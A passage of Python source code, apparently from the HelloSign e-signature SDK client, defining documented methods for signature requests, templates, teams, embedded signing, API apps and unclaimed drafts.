return request.post(self.ACCOUNT_UPDATE_URL, {
'callback_url': self.account.callback_url
})
def verify_account(self, email_address):
''' Verify whether a HelloSign Account exists
Args:
email_address (str): Email address of the new account to create
Returns:
True or False
'''
request = self._get_request()
resp = request.post(self.ACCOUNT_VERIFY_URL, {
'email_address': email_address
})
return ('account' in resp)
# ---- SIGNATURE REQUEST METHODS -------------------
@api_resource(SignatureRequest)
def get_signature_request(self, signature_request_id):
''' Get a signature request by its ID
Args:
signature_request_id (str): The id of the SignatureRequest to retrieve
Returns:
A SignatureRequest object
'''
request = self._get_request()
parameters = None
return request.get(self.SIGNATURE_REQUEST_INFO_URL + signature_request_id, parameters=parameters)
@api_resource_list(SignatureRequest)
def get_signature_request_list(self, page=1, page_size=None):
''' Get a list of SignatureRequest that you can access
This includes SignatureRequests you have sent as well as received, but
not ones that you have been CCed on.
Args:
page (int, optional): Which page number of the SignatureRequest list to return. Defaults to 1.
page_size (int, optional): Number of SignatureRequests to return per page. When not explicit
it defaults to 20.
Returns:
A ResourceList object
'''
request = self._get_request()
parameters = {
"page": page,
"page_size": page_size
}
return request.get(self.SIGNATURE_REQUEST_LIST_URL, parameters=parameters)
def get_signature_request_file(self, signature_request_id, path_or_file=None, file_type=None, filename=None, response_type=None):
''' Download the PDF copy of the current documents
Args:
signature_request_id (str): Id of the signature request
path_or_file (str or file): A writable File-like object or a full path to save the PDF file to.
filename (str): [DEPRECATED] Filename to save the PDF file to. This should be a full path.
file_type (str): Type of file to return. Either "pdf" for a single merged document or "zip"
for a collection of individual documents. Defaults to "pdf" if not specified.
response_type (str): File type of response to return. Either "url" to return a URL link to the file
or "data_uri" to return the file as a base64 encoded string. Only applicable to the "pdf" file_type.
Returns:
Returns a PDF file, URL link to file, or base64 encoded file
'''
request = self._get_request()
url = self.SIGNATURE_REQUEST_DOWNLOAD_PDF_URL + signature_request_id
if response_type == 'url':
url += '?get_url=1'
elif response_type == 'data_uri':
url += '?get_data_uri=1'
else:
if file_type:
url += '?file_type=%s' % file_type
return request.get_file(url, path_or_file or filename)
return request.get(url)
def send_signature_request(self, test_mode=False, client_id=None, files=None, file_urls=None,
title=None, subject=None, message=None, signing_redirect_url=None,
signers=None, cc_email_addresses=None, form_fields_per_document=None,
use_text_tags=False, hide_text_tags=False, custom_fields=None,
metadata=None, allow_decline=False, allow_reassign=False, signing_options=None, attachments=None):
''' Creates and sends a new SignatureRequest with the submitted documents
Creates and sends a new SignatureRequest with the submitted documents.
If form_fields_per_document is not specified, a signature page will be
affixed where all signers will be required to add their signature,
signifying their agreement to all contained documents.
Args:
test_mode (bool, optional): Whether this is a test, the signature request will not be legally binding
if set to True. Defaults to False.
client_id (str): Pass client_id. For non embedded requests this can be used for white-labeling
files (list of str): The uploaded file(s) to send for signature.
file_urls (list of str): URLs of the file for HelloSign to download to send for signature. Use either `files` or `file_urls`
title (str, optional): The title you want to assign to the SignatureRequest.
subject (str, optional): The subject in the email that will be sent to the signers.
message (str, optional): The custom message in the email that will be sent to the signers.
signing_redirect_url (str, optional): The URL you want the signer redirected to after they successfully sign.
signers (list of dict): A list of signers, which each has the following attributes:
name (str): The name of the signer
email_address (str): Email address of the signer
order (str, optional): The order the signer is required to sign in
pin (str, optional): The 4- to 12-character access code that will secure this signer's signature page
cc_email_addresses (list, optional): A list of email addresses that should be CC'd on the request.
form_fields_per_document (str or list of dict, optional): The signer components that should appear on the document, expressed as a serialized
JSON data structure which is a list of lists of the form fields. Please refer to the API reference of HelloSign for more details (https://app.hellosign.com/api/reference#SignatureRequest).
use_text_tags (bool, optional): Use text tags in the provided file(s) to specify signer components.
hide_text_tags (bool, optional): Hide text tag areas.
custom_fields (list of dict, optional): A list of custom fields defined by Text Tags for Form Fields per Document.
An item of the list should look like this: `{'name: value'}`
metadata (dict, optional): Metadata associated with the signature request.
allow_decline (bool, optional): Allows signers to decline to sign a document if set to True. Defaults to False.
allow_reassign (bool, optional): Allows signers to reassign their signature requests to other signers if set to True. Defaults to False.
signing_options (dict, optional): Allows the requester to specify the types allowed for creating a signature. Defaults to account settings.
attachments (list of dict): A list of attachments, each with the following attributes:
name (str): The name of the attachment
instructions (str): The instructions for uploading the attachment
signer_index (int): The index of the signer who needs to upload the attachments, see signers parameter for more details
required (bool, optional): Determines if the attachment must be uploaded
Returns:
A SignatureRequest object
'''
self._check_required_fields({
"signers": signers
}, [{
"files": files,
"file_urls": file_urls
}]
)
params = {
'test_mode': test_mode,
'client_id': client_id,
'files': files,
'file_urls': file_urls,
'title': title,
'subject': subject,
'message': message,
'signing_redirect_url': signing_redirect_url,
'signers': signers,
'cc_email_addresses': cc_email_addresses,
'form_fields_per_document': form_fields_per_document,
'use_text_tags': use_text_tags,
'hide_text_tags': hide_text_tags,
'custom_fields': custom_fields,
'metadata': metadata,
'allow_decline': allow_decline,
'allow_reassign': allow_reassign,
'signing_options': signing_options,
'attachments': attachments
}
return self._send_signature_request(**params)
def send_signature_request_with_template(self, test_mode=False, template_id=None,
template_ids=None, title=None, subject=None, message=None,
signing_redirect_url=None, signers=None, ccs=None, custom_fields=None,
metadata=None, allow_decline=False, files=None, file_urls=None, signing_options=None):
''' Creates and sends a new SignatureRequest based off of a Template
Creates and sends a new SignatureRequest based off of the Template
specified with the template_id parameter.
Args:
test_mode (bool, optional): Whether this is a test, the signature request will not be legally binding if set to True. Defaults to False.
template_id (str): The id of the Template to use when creating the SignatureRequest. Mutually exclusive with template_ids.
template_ids (list): The ids of the Templates to use when creating the SignatureRequest. Mutually exclusive with template_id.
title (str, optional): The title you want to assign to the SignatureRequest
subject (str, optional): The subject in the email that will be sent to the signers
message (str, optional): The custom message in the email that will be sent to the signers
signing_redirect_url (str, optional): The URL you want the signer redirected to after they successfully sign.
signers (list of dict): A list of signers, which each has the following attributes:
role_name (str): Signer role
name (str): The name of the signer
email_address (str): Email address of the signer
pin (str, optional): The 4- to 12-character access code that will secure this signer's signature page
ccs (list of str, optional): The email address of the CC filling the role of RoleName.
Required when a CC role exists for the Template. Each dict has the following attributes:
role_name (str): CC role name
email_address (str): CC email address
custom_fields (list of dict, optional): A list of custom fields.
Required when a CustomField exists in the Template. An item of the list should look like this: `{'name: value'}`
metadata (dict, optional): Metadata to associate with the signature request
allow_decline (bool, optional): Allows signers to decline to sign a document if set to 1. Defaults to 0.
files (list of str): The uploaded file(s) to append to the Signature Request.
file_urls (list of str): URLs of the file for HelloSign to download to append to the Signature Request.
Use either `files` or `file_urls`
signing_options (dict, optional): Allows the requester to specify the types allowed for creating a signature.
Defaults to account settings.
Returns:
A SignatureRequest object
'''
self._check_required_fields({
"signers": signers
}, [{
"template_id": template_id,
"template_ids": template_ids,
"files": files,
"file_urls": file_urls
}]
)
params = {
'test_mode': test_mode,
'template_id': template_id,
'template_ids': template_ids,
'title': title,
'subject': subject,
'message': message,
'signing_redirect_url': signing_redirect_url,
'signers': signers,
'ccs': ccs,
'custom_fields': custom_fields,
'metadata': metadata,
'allow_decline': allow_decline,
'files': files,
'file_urls': file_urls,
'signing_options': signing_options
}
return self._send_signature_request_with_template(**params)
@api_resource(SignatureRequest)
def remind_signature_request(self, signature_request_id, email_address, name=None):
''' Sends an email to the signer reminding them to sign the signature request
Sends an email to the signer reminding them to sign the signature
request. You cannot send a reminder within 1 hours of the last reminder
that was sent. This includes manual AND automatic reminders.
Args:
signature_request_id (str): The id of the SignatureRequest to send a reminder for
email_address (str): The email address of the signer to send a reminder to
name (str, optional): The name of the signer to send a reminder to
Returns:
A SignatureRequest object
'''
request = self._get_request()
return request.post(self.SIGNATURE_REQUEST_REMIND_URL + signature_request_id, data={
"email_address": email_address,
"name": name
})
@api_resource(SignatureRequest)
def update_signature_request(self, signature_request_id, signature_id, email_address):
''' Updates the email address for a given signer on a signature request.
Args:
signature_request_id (str): The id of the SignatureRequest to update
signature_id (str): The signature id for the recipient
email_address (str): The new email address of the recipient
Returns:
A SignatureRequest object
'''
request = self._get_request()
return request.post(self.SIGNATURE_REQUEST_UPDATE_URL + signature_request_id, data={
"signature_id": signature_id,
"email_address": email_address
})
def cancel_signature_request(self, signature_request_id):
''' Cancels a SignatureRequest
Cancels a SignatureRequest. After canceling, no one will be able to sign
or access the SignatureRequest or its documents. Only the requester can
cancel and only before everyone has signed.
Args:
signature_request_id (str): The id of the signature request to cancel
Returns:
None
'''
request = self._get_request()
request.post(url=self.SIGNATURE_REQUEST_CANCEL_URL + signature_request_id, get_json=False)
def remove_signature_request_access(self, signature_request_id):
''' Removes your access to a completed SignatureRequest
The SignatureRequest must be fully executed by all parties (signed or declined to sign).
Other parties will continue to maintain access to the completed signature request document(s).
Args:
signature_request_id (str): The id of the signature request to remove
Returns:
None
'''
request = self._get_request()
request.post(url=self.SIGNATURE_REQUEST_REMOVE_ACCESS_URL + signature_request_id, get_json=False)
def send_signature_request_embedded(self, test_mode=False, client_id=None,
files=None, file_urls=None, title=None, subject=None, message=None,
signing_redirect_url=None, signers=None, cc_email_addresses=None,
form_fields_per_document=None, use_text_tags=False, hide_text_tags=False,
metadata=None, allow_decline=False, allow_reassign=False, signing_options=None, attachments=None):
''' Creates and sends a new SignatureRequest with the submitted documents
Creates a new SignatureRequest with the submitted documents to be signed
in an embedded iFrame. If form_fields_per_document or text tags are not specified, a
signature page will be affixed where all signers will be required to add
their signature, signifying their agreement to all contained documents.
Note that embedded signature requests can only be signed in embedded
iFrames whereas normal signature requests can only be signed on
HelloSign.
Args:
test_mode (bool, optional): Whether this is a test, the signature request will not be legally binding if set to True. Defaults to False.
client_id (str): Client id of the app you're using to create this embedded signature request.
Visit the embedded page to learn more about this parameter (https://www.hellosign.com/api/embeddedSigningWalkthrough)
files (list of str): The uploaded file(s) to send for signature
file_urls (list of str): URLs of the file for HelloSign to download to send for signature. Use either `files` or `file_urls`
title (str, optional): The title you want to assign to the SignatureRequest
subject (str, optional): The subject in the email that will be sent to the signers
message (str, optional): The custom message in the email that will be sent to the signers
signing_redirect_url (str, optional): The URL you want the signer redirected to after they successfully sign.
signers (list of dict): A list of signers, which each has the following attributes:
name (str): The name of the signer
email_address (str): Email address of the signer
order (str, optional): The order the signer is required to sign in
pin (str, optional): The 4- to 12-character access code that will secure this signer's signature page
cc_email_addresses (list, optional): A list of email addresses that should be CCed
form_fields_per_document (str or list of dict, optional): The fields that should appear on the document, expressed as a serialized
JSON data structure which is a list of lists of the form fields. Please refer to the API reference of HelloSign for more details (https://www.hellosign.com/api/reference#SignatureRequest)
use_text_tags (bool, optional): Use text tags in the provided file(s) to create form fields
hide_text_tags (bool, optional): Hide text tag areas
metadata (dict, optional): Metadata to associate with the signature request
allow_decline (bool, optional): Allows signers to decline to sign a document if set to 1. Defaults to 0.
allow_reassign (bool, optional): Allows signers to reassign their signature requests to other signers if set to True. Defaults to False.
signing_options (dict, optional): Allows the requester to specify the types allowed for creating a signature. Defaults to account settings.
attachments (list of dict): A list of attachments, each with the following attributes:
name (str): The name of attachment
instructions (str): The instructions for uploading the attachment
signer_index (int): The signer's index whose needs to upload the attachments, see signers parameter for more details
required (bool, optional): Determines if the attachment must be uploaded
Returns:
A SignatureRequest object
'''
self._check_required_fields({
"signers": signers,
"client_id": client_id
}, [{
"files": files,
"file_urls": file_urls
}]
)
params = {
'test_mode': test_mode,
'client_id': client_id,
'files': files,
'file_urls': file_urls,
'title': title,
'subject': subject,
'message': message,
'signing_redirect_url': signing_redirect_url,
'signers': signers,
'cc_email_addresses': cc_email_addresses,
'form_fields_per_document': form_fields_per_document,
'use_text_tags': use_text_tags,
'hide_text_tags': hide_text_tags,
'metadata': metadata,
'allow_decline': allow_decline,
'allow_reassign': allow_reassign,
'signing_options': signing_options,
'is_for_embedded_signing': True,
'attachments': attachments
}
return self._send_signature_request(**params)
def send_signature_request_embedded_with_template(self, test_mode=False,
client_id=None, template_id=None, template_ids=None, title=None,
subject=None, message=None, signing_redirect_url=None, signers=None,
ccs=None, custom_fields=None, metadata=None, allow_decline=False,
files=None, file_urls=None, signing_options=None):
''' Creates and sends a new SignatureRequest based off of a Template
Creates a new SignatureRequest based on the given Template to be
signed in an embedded iFrame. Note that embedded signature requests can
only be signed in embedded iFrames whereas normal signature requests can
only be signed on HelloSign.
Args:
test_mode (bool, optional): Whether this is a test, the signature request will not be legally binding if set to True. Defaults to False.
client_id (str): Client id of the app you're using to create this embedded signature request.
Visit the embedded page to learn more about this parameter (https://app.hellosign.com/api/embeddedSigningWalkthrough)
template_id (str): The id of the Template to use when creating the SignatureRequest. Mutually exclusive with template_ids.
template_ids (list): The ids of the Templates to use when creating the SignatureRequest. Mutually exclusive with template_id.
title (str, optional): The title you want to assign to the SignatureRequest
subject (str, optional): The subject in the email that will be sent to the signers
message (str, optional): The custom message in the email that will be sent to the signers
signing_redirect_url (str, optional): The URL you want the signer redirected to after they successfully sign.
signers (list of dict): A list of signers, which each has the following attributes:
name (str): The name of the signer
email_address (str): Email address of the signer
pin (str, optional): The 4- to 12-character access code that will secure this signer's signature page
ccs (list of dict, optional): The email address of the CC filling the role of RoleName.
Required when a CC role exists for the Template. Each dict has the following attributes:
role_name (str): CC role name
email_address (str): CC email address
custom_fields (list of dict, optional): A list of custom fields. Required when a CustomField exists in the Template.
An item of the list should look like this: `{'name: value'}`
metadata (dict, optional): Metadata to associate with the signature request
allow_decline (bool, optional): Allows signers to decline to sign a document if set to 1. Defaults to 0.
files (list of str): The uploaded file(s) to append to the Signature Request.
file_urls (list of str): URLs of the file for HelloSign to download to append to the Signature Request. Use either `files` or `file_urls`
signing_options (dict, optional): Allows the requester to specify the types allowed for creating a signature. Defaults to account settings.
Returns:
A SignatureRequest object
'''
self._check_required_fields({
"signers": signers,
"client_id": client_id
}, [{
"template_id": template_id,
"template_ids": template_ids,
"files": files,
"file_urls": file_urls
}]
)
params = {
'test_mode': test_mode,
'client_id': client_id,
'template_id': template_id,
'template_ids': template_ids,
'title': title,
'subject': subject,
'message': message,
'signing_redirect_url': signing_redirect_url,
'signers': signers,
'ccs': ccs,
'custom_fields': custom_fields,
'metadata': metadata,
'allow_decline': allow_decline,
'files': files,
'file_urls': file_urls,
'signing_options': signing_options
}
return self._send_signature_request_with_template(**params)
# ---- TEMPLATE METHODS -----------------------
@api_resource(Template)
def get_template(self, template_id):
''' Gets a Template which includes a list of Accounts that can access it
Args:
template_id (str): The id of the template to retrieve
Returns:
A Template object
'''
request = self._get_request()
return request.get(self.TEMPLATE_GET_URL + template_id)
@api_resource_list(Template)
def get_template_list(self, page=1, page_size=None, account_id=None, query=None):
''' Lists your Templates
Args:
page (int, optional): Page number of the template List to return. Defaults to 1.
page_size (int, optional): Number of objects to be returned per page, must be between 1 and 100, default is 20.
account_id (str, optional): Which account to return Templates for. Must be a team member.
Use "all" to indicate all team members. Defaults to your account.
query (str, optional): String that includes search terms and/or fields to be used to filter the Template objects.
Returns:
A ResourceList object
'''
request = self._get_request()
parameters = {
'page': page,
'page_size': page_size,
'account_id': account_id,
'query': query
}
return request.get(self.TEMPLATE_GET_LIST_URL, parameters=parameters)
# RECOMMEND: this api does not fail if the user has been added...
def add_user_to_template(self, template_id, account_id=None, email_address=None):
''' Gives the specified Account access to the specified Template
Args:
template_id (str): The id of the template to give the account access to
account_id (str): The id of the account to give access to the template. The account id prevails if both account_id and email_address are provided.
email_address (str): The email address of the account to give access to.
Returns:
A Template object
'''
return self._add_remove_user_template(self.TEMPLATE_ADD_USER_URL, template_id, account_id, email_address)
def remove_user_from_template(self, template_id, account_id=None, email_address=None):
''' Removes the specified Account's access to the specified Template
Args:
template_id (str): The id of the template to remove the account's access from.
account_id (str): The id of the account to remove access from the template.
The account id prevails if both account_id and email_address are provided.
email_address (str): The email address of the account to remove access from.
Returns:
An Template object
'''
return self._add_remove_user_template(self.TEMPLATE_REMOVE_USER_URL, template_id, account_id, email_address)
def delete_template(self, template_id):
''' Deletes the specified template
Args:
template_id (str): The id of the template to delete
Returns:
A status code
'''
url = self.TEMPLATE_DELETE_URL
request = self._get_request()
response = request.post(url + template_id, get_json=False)
return response
def get_template_files(self, template_id, path_or_file=None, file_type=None,
filename=None, response_type=None):
''' Downloads a copy of a template's original files
Args:
template_id (str): id of the template to download
path_or_file (str or file): A writable File-like object or a full path to save the PDF file to.
filename (str): [DEPRECATED] Filename to save the PDF file to. This should be a full path.
file_type (str): Type of file to return. Either "pdf" for a single merged document or
"zip" for a collection of individual documents. Defaults to "pdf" if not specified.
response_type (str): File type of response to return. Either "url" to return a URL link to the file
or "data_uri" to return the file as a base64 encoded string. Only applicable to the "pdf" file_type.
Returns:
Returns a PDF file, URL link to file, or base64 encoded file
'''
request = self._get_request()
url = self.TEMPLATE_GET_FILES_URL + template_id
if file_type:
url += '?file_type=%s' % file_type
return request.get_file(url, path_or_file or filename)
if response_type == 'url':
url += '?get_url=1'
elif response_type == 'data_uri':
url += '?get_data_uri=1'
return request.get(url)
def update_template_files(self, template_id, files=None, file_urls=None,
subject=None, message=None, client_id=None, test_mode=False):
''' Overlays a new file with the overlay of an existing template.
Args:
template_id (str): The id of the template whose files to update
files (list of str): The file(s) to use for the template.
file_urls (list of str): URLs of the file for HelloSign to use for the template.
Use either `files` or `file_urls`, but not both.
subject (str, optional): The default template email subject
message (str, optional): The default template email message
test_mode (bool, optional): Whether this is a test, the signature request created
from this Template will not be legally binding if set to 1. Defaults to 0.
client_id (str): Client id of the app associated with the Template
Returns:
A Template object
'''
request = self._get_request()
return request.post(self.TEMPLATE_UPDATE_FILES_URL + template_id, data={
"files": files,
"file_urls": file_urls,
"subject": subject,
"message": message,
"test_mode": self._boolean(test_mode),
"client_id": client_id
})
def create_embedded_template_draft(self, client_id, signer_roles, test_mode=False,
files=None, file_urls=None, title=None, subject=None, message=None,
cc_roles=None, merge_fields=None, skip_me_now=False, use_preexisting_fields=False,
allow_reassign=False, metadata=None, allow_ccs=False, attachments=None):
''' Creates an embedded Template draft for further editing.
Args:
test_mode (bool, optional): Whether this is a test, the signature request
created from this draft will not be legally binding if set to 1. Defaults to 0.
client_id (str): Client id of the app you're using to create this draft.
files (list of str): The file(s) to use for the template.
file_urls (list of str): URLs of the file for HelloSign to use for the template.
Use either `files` or `file_urls`, but not both.
title (str, optional): The template title
subject (str, optional): The default template email subject
message (str, optional): The default template email message
signer_roles (list of dict): A list of signer roles, each of which has the following attributes:
name (str): The role name of the signer that will be displayed when the
template is used to create a signature request.
order (str, optional): The order in which this signer role is required to sign.
cc_roles (list of str, optional): The CC roles that must be assigned when using the template to send a signature request
merge_fields (list of dict, optional): The merge fields that can be placed on the template's
document(s) by the user claiming the template draft. Each must have the following two parameters:
name (str): The name of the merge field. Must be unique.
type (str): Can only be "text" or "checkbox".
skip_me_now (bool, optional): Disables the "Me (Now)" option for the document's preparer. Defaults to 0.
use_preexisting_fields (bool, optional): Whether to use preexisting PDF fields
metadata (dict, optional): Metadata to associate with the draft
allow_reassign (bool, optional): Allows signers to reassign their signature
requests to other signers if set to True. Defaults to False.
allow_ccs (bool, optional): Specifies whether the user is allowed to
provide email addresses to CC when creating a template. Defaults to False.
attachments (list of dict): A list of attachments, each with the following attributes:
name (str): The name of the attachment
instructions (str): The instructions for uploading the attachment
signer_index (int): The index of the signer who needs to upload the attachments, see signers parameter for more details
required (bool, optional): Determines if the attachment must be uploaded
Returns:
A Template object specifying the id of the draft
'''
params = {
'test_mode': test_mode,
'client_id': client_id,
'files': files,
'file_urls': file_urls,
'title': title,
'subject': subject,
'message': message,
'signer_roles': signer_roles,
'cc_roles': cc_roles,
'merge_fields': merge_fields,
'skip_me_now': skip_me_now,
'use_preexisting_fields': use_preexisting_fields,
'metadata': metadata,
'allow_reassign': allow_reassign,
'allow_ccs': allow_ccs,
'attachments': attachments
}
return self._create_embedded_template_draft(**params)
# ---- TEAM METHODS --------------------------------
@api_resource(Team)
def get_team_info(self):
''' Gets your Team and a list of its members
Returns information about your team as well as a list of its members.
If you do not belong to a team, a 404 error with an error_name of
"not_found" will be returned.
Returns:
A Team object
'''
request = self._get_request()
return request.get(self.TEAM_INFO_URL)
@api_resource(Team)
def create_team(self, name):
''' Creates a new Team
Creates a new Team and makes you a member. You must not currently belong to a team to invoke.
Args:
name (str): The name of your team
Returns:
A Team object
'''
request = self._get_request()
return request.post(self.TEAM_CREATE_URL, {"name": name})
# RECOMMEND: The api event create a new team if you do not belong to any team
@api_resource(Team)
def update_team_name(self, name):
''' Updates a Team's name
Args:
name (str): The new name of your team
Returns:
A Team object
'''
request = self._get_request()
return request.post(self.TEAM_UPDATE_URL, {"name": name})
def destroy_team(self):
''' Delete your Team
Deletes your Team. Can only be invoked when you have a team with only one member left (yourself).
Returns:
None
'''
request = self._get_request()
request.post(url=self.TEAM_DESTROY_URL, get_json=False)
def add_team_member(self, account_id=None, email_address=None):
''' Add or invite a user to your Team
Args:
account_id (str): The id of the account of the user to invite to your team.
email_address (str): The email address of the account to invite to your team.
The account id prevails if both account_id and email_address are provided.
Returns:
A Team object
'''
return self._add_remove_team_member(self.TEAM_ADD_MEMBER_URL, email_address, account_id)
# RECOMMEND: Does not fail if user has been removed
def remove_team_member(self, account_id=None, email_address=None):
''' Remove a user from your Team
Args:
account_id (str): The id of the account of the user to remove from your team.
email_address (str): The email address of the account to remove from your team.
The account id prevails if both account_id and email_address are provided.
Returns:
A Team object
'''
return self._add_remove_team_member(self.TEAM_REMOVE_MEMBER_URL, email_address, account_id)
# ---- EMBEDDED METHODS ----------------------------
@api_resource(Embedded)
def get_embedded_object(self, signature_id):
''' Retrieves an embedded signing object
Retrieves an embedded object containing a signature url that can be opened in an iFrame.
Args:
signature_id (str): The id of the signature to get a signature url for
Returns:
An Embedded object
'''
request = self._get_request()
return request.get(self.EMBEDDED_OBJECT_GET_URL + signature_id)
@api_resource(Embedded)
def get_template_edit_url(self, template_id, test_mode=False, cc_roles=None,
merge_fields=None, skip_signer_roles=False, skip_subject_message=False):
''' Retrieves a embedded template for editing
Retrieves an embedded object containing a template edit url that can be opened in an iFrame.
Args:
template_id (str): The id of the template to get an edit url for
test_mode (bool, optional): Whether this is a test, the signature requests created
from this template will not be legally binding if set to True. Defaults to False.
cc_roles (list of str, optional): The CC roles that must be assigned when using
the template to send a signature request
merge_fields (list of dict, optional): The merge fields that can be placed on the template's document(s)
by the user claiming the template draft. Each must have the following two parameters:
name (str): The name of the merge field. Must be unique.
type (str): Can only be "text" or "checkbox".
skip_me_now (bool, optional): Disables the "Me (Now)" option for the document's preparer.
Defaults to False.
skip_subject_message (bool, optional): Disables the option to edit the template's default
subject and message. Defaults to False.
Returns:
An Embedded object
'''
# Prep CCs
ccs_payload = HSFormat.format_param_list(cc_roles, 'cc_roles')
# Prep Merge Fields
merge_fields_payload = {
'merge_fields': json.dumps(merge_fields)
}
payload = {
"test_mode": self._boolean(test_mode),
"skip_signer_roles": self._boolean(skip_signer_roles),
"skip_subject_message": self._boolean(skip_subject_message)
}
# remove attributes with none value
payload = HSFormat.strip_none_values(payload)
url = self.EMBEDDED_TEMPLATE_EDIT_URL + template_id
data = {}
data.update(payload)
data.update(ccs_payload)
data.update(merge_fields_payload)
request = self._get_request()
response = request.post(url, data=data)
return response
# ---- API APP METHODS --------------------------------
@api_resource(ApiApp)
def get_api_app_info(self, client_id):
''' Gets an API App by its Client ID
Returns information about the specified API App
Returns:
An ApiApp object
'''
request = self._get_request()
return request.get(self.API_APP_INFO_URL + client_id)
@api_resource_list(ApiApp)
def get_api_app_list(self, page=1, page_size=None):
''' Lists your API Apps
Args:
page (int, optional): Page number of the API App List to return. Defaults to 1.
page_size (int, optional): Number of objects to be returned per page, must be between 1 and 100, default is 20.
Returns:
A ResourceList object
'''
request = self._get_request()
parameters = {
'page': page,
'page_size': page_size
}
return request.get(self.API_APP_LIST_URL, parameters=parameters)
@api_resource(ApiApp)
def create_api_app(self, name, domain, callback_url=None, custom_logo_file=None,
oauth_callback_url=None, oauth_scopes=None, white_labeling_options=None,
option_insert_everywhere=False):
''' Creates a new API App
Creates a new API App with the specified settings.
Args:
name (str): The name of the API App
domain (str): The domain name associated with the API App
callback_url (str, optional): The URL that HelloSign events will be POSTed to
custom_logo_file (str, optional): The image file to use as a custom logo
oauth_callback_url (str, optional): The URL that HelloSign OAuth events will be POSTed to
oauth_scopes (list of str, optional): List of the API App's OAuth scopes
white_labeling_options (dict, optional): Customization options for the API App's signer page
option_insert_everywhere (bool, optional): Denotes if signers can "Insert Everywhere" when
signing a document
Returns:
An ApiApp object
'''
# Prep custom logo
custom_logo_payload = HSFormat.format_logo_params(custom_logo_file)
payload = {
"name": name,
"domain": domain,
"callback_url": callback_url,
"oauth[callback_url]": oauth_callback_url,
"oauth[scopes]": oauth_scopes,
"white_labeling_options": json.dumps(white_labeling_options),
"options[can_insert_everywhere]": self._boolean(option_insert_everywhere)
}
# remove attributes with none value
payload = HSFormat.strip_none_values(payload)
request = self._get_request()
return request.post(self.API_APP_CREATE_URL, data=payload, files=custom_logo_payload)
@api_resource(ApiApp)
def update_api_app(self, client_id, name=None, domain=None, callback_url=None,
custom_logo_file=None, oauth_callback_url=None, oauth_scopes=None,
white_labeling_options=None, option_insert_everywhere=False):
''' Updates the specified API App
Updates an API App with the specified settings.
Args:
name (str): The name of the API App
domain (str): The domain name associated with the API App
callback_url (str, optional): The URL that HelloSign events will be POSTed to
custom_logo_file (str, optional): The image file to use as a custom logo
oauth_callback_url (str, optional): The URL that HelloSign OAuth events will be POSTed to
oauth_scopes (list of str, optional): List of the API App's OAuth scopes
white_labeling_options (dict, optional): Customization options for the API App's signer page
option_insert_everywhere (bool, optional): Denotes if signers can "Insert Everywhere" when
signing a document
Returns:
An ApiApp object
'''
# Prep custom logo
custom_logo_payload = HSFormat.format_logo_params(custom_logo_file)
payload = {
"name": name,
"domain": domain,
"callback_url": callback_url,
"oauth[callback_url]": oauth_callback_url,
"oauth[scopes]": oauth_scopes,
"white_labeling_options": json.dumps(white_labeling_options),
"options[can_insert_everywhere]": self._boolean(option_insert_everywhere)
}
# remove attributes with none value
payload = HSFormat.strip_none_values(payload)
request = self._get_request()
url = self.API_APP_UPDATE_URL + client_id
return request.post(url, data=payload, files=custom_logo_payload)
def delete_api_app(self, client_id):
''' Deletes the specified API App
Deletes an API App. Can only be involved for API Apps you own.
Returns:
None
'''
request = self._get_request()
request.delete(url=self.API_APP_DELETE_URL + client_id)
# ---- UNCLAIMED DRAFT METHODS ---------------------
def create_unclaimed_draft(self, test_mode=False, files=None, file_urls=None,
draft_type=None, subject=None, message=None, signers=None, custom_fields=None,
cc_email_addresses=None, signing_redirect_url=None, form_fields_per_document=None,
metadata=None, use_preexisting_fields=False, use_text_tags=False,
hide_text_tags=False, allow_decline=False, signing_options=None, attachments=None):
''' Creates a new Draft that can be claimed using the claim URL
Creates a new Draft that can be claimed using the claim URL. The first
authenticated user to access the URL will claim the Draft and will be
shown either the "Sign and send" or the "Request signature" page with
the Draft loaded. Subsequent access to the claim URL will result in a
404. If the type is "send_document" then only the file parameter is
required. If the type is "request_signature", then the identities of the
signers and optionally the location of signing elements on the page are
also required.
Args:
test_mode (bool, optional): Whether this is a test, the signature request created from this draft will not be legally binding if set to True. Defaults to False.
files (list of str): The uploaded file(s) to send for signature
file_urls (list of str): URLs of the file for HelloSign to download to send for signature. Use either `files` or `file_urls`
draft_type (str): The type of unclaimed draft to create. Use "send_document" to create a claimable file, and "request_signature"
for a claimable signature request. If the type is "request_signature" then signers name and email_address are not optional.
subject (str, optional): The subject in the email that will be sent to the signers
message (str, optional): The custom message in the email that will be sent to the signers
signers (list of dict): A list of signers, which each has the following attributes:
name (str): The name of the signer
email_address (str): Email address of the signer
order (str, optional): The order the signer is required to sign in
custom_fields (list of dict, optional): A list of custom fields. Required when a CustomField exists in the Template.
An item of the list should look like this: `{'name: value'}`
cc_email_addresses (list of str, optional): A list of email addresses that should be CC'd
signing_redirect_url (str, optional): The URL you want the signer redirected to after they successfully sign.
form_fields_per_document (str or list of dict, optional): The fields that should appear on the document, expressed as a serialized JSON
data structure which is a list of lists of the form fields. Please refer to the API reference of HelloSign for more details (https://www.hellosign.com/api/reference#SignatureRequest)
metadata (dict, optional): Metadata to associate with the draft
use_preexisting_fields (bool): Whether to use preexisting PDF fields
use_text_tags (bool, optional): Use text tags in the provided file(s) to create form fields
hide_text_tags (bool, optional): Hide text tag areas
allow_decline (bool, optional): Allows signers to decline to sign a document if set to 1. Defaults to 0.
signing_options (dict, optional): Allows the requester to specify the types allowed for creating a signature.
Defaults to account settings.
attachments (list of dict): A list of attachments, each with the following attributes:
name (str): The name of the attachment
instructions (str): The instructions for uploading the attachment
signer_index (int): The index of the signer who needs to upload the attachments, see signers parameter for more details
required (bool, optional): Determines if the attachment must be uploaded
Returns:
An UnclaimedDraft object
'''
self._check_required_fields({
'draft_type': draft_type
}, [{
"files": files,
"file_urls": file_urls
}]
)
params = {
'test_mode': test_mode,
'files': files,
'file_urls': file_urls,
'draft_type': draft_type,
'subject': subject,
'message': message,
'signing_redirect_url': signing_redirect_url,
'signers': signers,
'custom_fields': custom_fields,
'cc_email_addresses': cc_email_addresses,
'form_fields_per_document': form_fields_per_document,
'metadata': metadata,
'use_preexisting_fields': use_preexisting_fields,
'use_text_tags': use_text_tags,
'hide_text_tags': hide_text_tags,
'allow_decline': allow_decline,
'signing_options': signing_options,
'attachments': attachments
}
return self._create_unclaimed_draft(**params)
def create_embedded_unclaimed_draft(self, test_mode=False, client_id=None,
is_for_embedded_signing=False, requester_email_address=None, files=None,
file_urls=None, draft_type=None, subject=None, message=None, signers=None,
custom_fields=None, cc_email_addresses=None, signing_redirect_url=None,
requesting_redirect_url=None, form_fields_per_document=None, metadata=None,
use_preexisting_fields=False, use_text_tags=False, hide_text_tags=False,
